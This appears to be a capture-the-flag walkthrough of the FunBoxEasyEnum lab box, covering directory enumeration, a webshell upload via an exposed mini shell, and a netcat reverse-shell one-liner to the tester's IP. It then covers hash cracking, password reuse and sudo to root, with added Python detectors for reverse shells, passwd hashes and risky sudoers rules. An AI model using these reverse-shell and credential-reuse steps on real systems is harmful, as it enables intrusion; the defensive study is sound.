# FunBoxEasyEnum

## Nmap

```
sudo nmap 192.168.68.132 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Hitting port 80, we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c0ad1a3f9aed439fd9ca0b2f707775bf7f149c22%2Fimage.png?alt=media)

We now move on to enumerating with `dirsearch.py`, first running the SecLists `big.txt` wordlist against the target.

```
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35c919249d5e2e5b13543aa2c8f8a1bab4169d97%2Fimage.png?alt=media)

We view `robots.txt` and find it contains:

```
Allow: Enum_this_Box
```

I ran `dirsearch.py` against this and was unable to find anything further. Viewing `/phpmyadmin` and attempting to log in with default credentials shows we are unable to proceed with the default root account.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7d2c1ca2b607533aa211c42ea1868d2f488a3467%2Fimage.png?alt=media)

Running `dirsearch.py` again on the target, this time using the `--suffix` parameter to append `.php` to all entries, we find `/mini.php`.

```
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a63138d8590b43994ed0784662fbfe60b317626e%2Fimage.png?alt=media)

Browsing to `/mini.php` we come to Zerion Mini Shell 1.0. As shown below, I uploaded a webshell as `webshell.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-15f40b0669d0d1d5ed685cd2afa0387d2db304f8%2Fimage.png?alt=media)

Knowing that the above files exist in the web root, I then browsed to `/webshell.php` and was able to execute commands, confirming we are running as `www-data`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c8a55ba836c5232de8959151d74d30c19201643f%2Fimage.png?alt=media)

Running the command `which nc` shows that `netcat` is installed on the target machine. I set up a `netcat` listener on my target machine, then ran the following command in the webshell:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f
```

This results in a reverse shell.
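From the defender's side, the one-liner above is a recognisable shape in process-execution telemetry: `mkfifo`, an interactive shell (`sh -i`) and `nc` appearing in a single command line, launched by the web server account. The following added example (written for this page, not code from the original writeup) shows a small Python classifier run over constructed auditd/EDR-style log lines. The log format, the `uid=33` mapping to `www-data`, and the `192.0.2.10` listener address are assumptions.

```python
import re

# Constructed sample process-execution events (auditd/EDR style), not taken from the page.
# uid 33 is assumed to be www-data (Debian/Ubuntu). The first line is the fifo-backed
# netcat one-liner from the writeup with a documentation (RFC 5737) address substituted.
SAMPLE_LOGS = [
    'uid=33 comm="sh" cmdline="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.0.2.10 80 >/tmp/f"',
    'uid=33 comm="sh" cmdline="which nc"',
    'uid=1000 comm="bash" cmdline="mkfifo /tmp/pipe; gzip -c big.log > /tmp/pipe"',
    'uid=1000 comm="bash" cmdline="nc -zv db.internal 3306"',
    'uid=33 comm="sh" cmdline="ls -la /var/www/html"',
]

WEB_SERVER_UIDS = {33}  # assumption: the account the web server runs as
NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
INTERACTIVE_SHELL = re.compile(r"\b(?:sh|bash|dash)\s+-i\b")
LOG_RE = re.compile(r'uid=(\d+)\s+comm="([^"]*)"\s+cmdline="(.*)"$')


def parse_event(line):
    """Return {'uid', 'comm', 'cmdline'} for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"uid": int(m.group(1)), "comm": m.group(2), "cmdline": m.group(3)}


def command_names(cmdline):
    """Split a one-liner on ; | && || and return the basename of each segment's first word."""
    names = []
    for segment in re.split(r"\s*(?:;|\|\||&&|\|)\s*", cmdline):
        words = segment.strip().split()
        if words:
            names.append(words[0].rsplit("/", 1)[-1])
    return names


def classify(event):
    """Return an alert dict for a suspicious event, or None for benign activity."""
    names = set(command_names(event["cmdline"]))
    uses_fifo = "mkfifo" in names
    uses_netcat = bool(names & NETCAT_NAMES)
    interactive = bool(INTERACTIVE_SHELL.search(event["cmdline"]))
    from_web = event["uid"] in WEB_SERVER_UIDS

    if uses_fifo and uses_netcat and interactive:
        # All three pieces of the fifo-backed netcat shell in one command line.
        severity, reason = "high", "fifo-backed interactive shell piped through netcat"
    elif from_web and (uses_netcat or uses_fifo):
        # The web server account has no business making raw connections or fifos.
        severity, reason = "medium", "netcat/mkfifo executed by web server account"
    else:
        return None
    return {"uid": event["uid"], "severity": severity, "reason": reason,
            "cmdline": event["cmdline"]}


def scan(lines):
    """Run classify() over raw log lines and return the list of alerts."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event is not None:
            alert = classify(event)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(f"[{a['severity']}] uid={a['uid']} {a['reason']}: {a['cmdline']}")
```

Only the first sample line trips the high-confidence rule; the developer's legitimate `mkfifo` and port check on uid 1000 stay quiet, and `which nc` does not count as executing netcat because only the first word of each pipeline segment is treated as a command. The medium rule is deliberately narrow to the web server account, where even a plain `nc` is worth a look.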

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d95ed7d3865f75da07dc6d99e991654472310761%2Fimage.png?alt=media)

Upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Checking `/etc/passwd` shows that the user 'oracle' has a password hash stored directly in the file rather than in `/etc/shadow`, so it is readable by any local user, including `www-data`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-840ecf76e72185ad65e61fbb0ec2233f9703ed70%2Fimage.png?alt=media)
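Because `/etc/passwd` is world-readable, a hash in its second field is an audit finding on any host, not just this box. The following added example (written for this page, not code from the original writeup) is a small Python auditor that flags hashes and empty password fields in passwd-format text; the sample file content and the placeholder hash on the 'oracle' line are constructed.

```python
import sys

# Constructed /etc/passwd content for demonstration (not taken from the box). The
# 'oracle' line carries a placeholder md5crypt-style hash in the password field, which
# is the condition the writeup found; 'guest' has an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
karla:x:1000:1000:karla:/home/karla:/bin/bash
oracle:$1$PLACEHOLDER$notarealhashxxxxxxxxxx:1002:1002:oracle:/home/oracle:/bin/bash
guest::1003:1003:guest:/home/guest:/bin/bash
"""

# Values that mean "password lives in /etc/shadow" or "account locked", not a hash.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Return one dict per line; malformed lines get an 'error' key instead of fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "user": None, "error": "malformed entry"})
            continue
        user, pw, uid, _gid, _gecos, _home, shell = fields
        entries.append({"line": lineno, "user": user, "password": pw,
                        "uid": int(uid) if uid.isdigit() else None, "shell": shell})
    return entries


def audit_passwd(text):
    """Return a list of (user, issue) findings for things that do not belong in /etc/passwd."""
    findings = []
    for e in parse_passwd(text):
        if e.get("error"):
            findings.append((f"line {e['line']}", e["error"]))
            continue
        pw = e["password"]
        if pw == "":
            findings.append((e["user"], "empty password field: login without a password"))
        elif pw not in SHADOW_MARKERS:
            # /etc/passwd is world-readable, so any local user can copy this hash and crack it offline.
            findings.append((e["user"], "password hash stored in /etc/passwd instead of /etc/shadow"))
        if e["uid"] == 0 and e["user"] != "root":
            findings.append((e["user"], "uid 0 account other than root"))
    return findings


if __name__ == "__main__":
    # Pass a path (e.g. /etc/passwd) to audit a real file; otherwise the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for user, issue in audit_passwd(text):
        print(f"{user}: {issue}")
```

The fix for a finding like 'oracle' is `pwconv` (move hashes into `/etc/shadow`) followed by forcing a password change, since the old hash must be assumed cracked once it has been exposed.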

I then took the hash and ran it under mode 500 in `Hashcat` on my Windows host, which cracked the password as: **hiphop**

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5a500e674672238113c02c19acdb6d05bf4ff30c%2Fimage.png?alt=media)

I then used `su` to switch to the user 'oracle' and was successful.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c45c9801c5d60f666691a2edb328112afc584356%2Fimage.png?alt=media)

After poking about as the oracle user for a bit, I could not find anything interesting. I tried the hiphop password against the other users, with no luck. I decided to move back to `www-data` so I could read some files in `/etc/phpmyadmin`.

I disconnected the shell and ran the initial exploit on the web shell to reconnect as `www-data`. Moving into `/etc/phpmyadmin` and reading the `config-db.php` file, we see credential information.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35af65115ca72466a58b67f1b5b0f90311093e00%2Fimage.png?alt=media)

We find the credentials `phpmyadmin:tgbzhnujm!`. I then logged in to MySQL and was unable to identify interesting information in the contained databases.

From here I started throwing the passwords at the users in the `/home/` directory until I got a match on the user 'karla'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2b2da0ff2df01d3b043c1b4b55e76e3efb0c64c2%2Fimage.png?alt=media)

Knowing this worked, I exited the shell and logged in over `SSH` with the same credentials, just so we have all the advantages of an `SSH` shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-12d9b346cb9e391951aa8c63c5bdafe8834c40e8%2Fimage.png?alt=media)

Checking `sudo -l`, we see Karla can run any command as anyone. For a nice easy root shell we can run the command below:

```
sudo /bin/bash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b74677a5326eb94b5959aa6c5f18be4bc2bd5b9b%2Fimage.png?alt=media)
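The rule behind that `sudo -l` output has the shape `karla ALL=(ALL:ALL) ALL`, which is root by another name; a shell such as `/bin/bash` in an otherwise restricted command list is equivalent. The following added example (written for this page, not code from the original writeup) parses sudoers-style rule lines and grades them, so a defender can spot such rules before a cracked password turns into root. The sample rules are constructed; the parser covers the common `user HOST=(runas) TAG: commands` form and is an assumption, not a full sudoers grammar.

```python
import re

# Constructed sudoers-style lines (not the box's real file). 'karla ALL=(ALL:ALL) ALL' is the
# shape of the rule the writeup describes: any command, as any user.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root ALL=(ALL:ALL) ALL
karla ALL=(ALL:ALL) ALL
backup ALL=(root) NOPASSWD: /usr/bin/rsync
deploy ALL=(www-data) /usr/bin/systemctl restart apache2, /bin/bash
%admin ALL=(ALL) ALL
"""

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+"                 # user, %group, or alias
    r"(?P<host>\S+?)\s*=\s*"            # host list, then '='
    r"(?:\((?P<runas>[^)]*)\)\s*)?"     # optional (runas_user[:runas_group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"        # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+)$"                    # comma-separated command list
)
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def parse_rule(line):
    """Parse one user-specification line; return None for comments, Defaults and blanks."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas = m.group("runas")
    if runas is None:
        runas_user = "root"                      # no (...) means the command runs as root
    else:
        runas_user = runas.split(":")[0].strip() or "<invoking user>"
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {"who": m.group("who"), "host": m.group("host"),
            "runas_user": runas_user, "tags": tags, "cmds": cmds}


def assess(rule):
    """Return (severity, findings) for one parsed rule; severity None means nothing notable."""
    findings = []
    basenames = {c.split()[0].rsplit("/", 1)[-1] for c in rule["cmds"]}
    unrestricted = "ALL" in rule["cmds"]
    if unrestricted:
        findings.append("command list is ALL")
    if basenames & SHELLS:
        findings.append("a shell is an allowed command (equivalent to ALL)")
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: no authentication required")
    privileged = rule["runas_user"] in {"ALL", "root"}
    if privileged and (unrestricted or basenames & SHELLS):
        severity = "critical" if "NOPASSWD" in rule["tags"] else "high"
    elif findings:
        severity = "medium"
    else:
        severity = None
    return severity, findings


def risky_rules(text):
    """Parse sudoers text and return the rules with findings, skipping root's own rule."""
    out = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["who"] == "root":
            continue
        severity, findings = assess(rule)
        if severity:
            out.append({"who": rule["who"], "severity": severity, "findings": findings})
    return out


if __name__ == "__main__":
    for r in risky_rules(SAMPLE_SUDOERS):
        print(f"[{r['severity']}] {r['who']}: {'; '.join(r['findings'])}")
```

On the sample, `karla` and `%admin` come out as high (any command as root, password still required), `backup` as medium for the `NOPASSWD` tag, and `deploy` as medium because `/bin/bash` sits in its command list. Run against a real `/etc/sudoers` and `/etc/sudoers.d/*`, rules rated high or critical are the ones where a single leaked or reused password, like the database password that worked for 'karla' here, is the whole distance to root.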
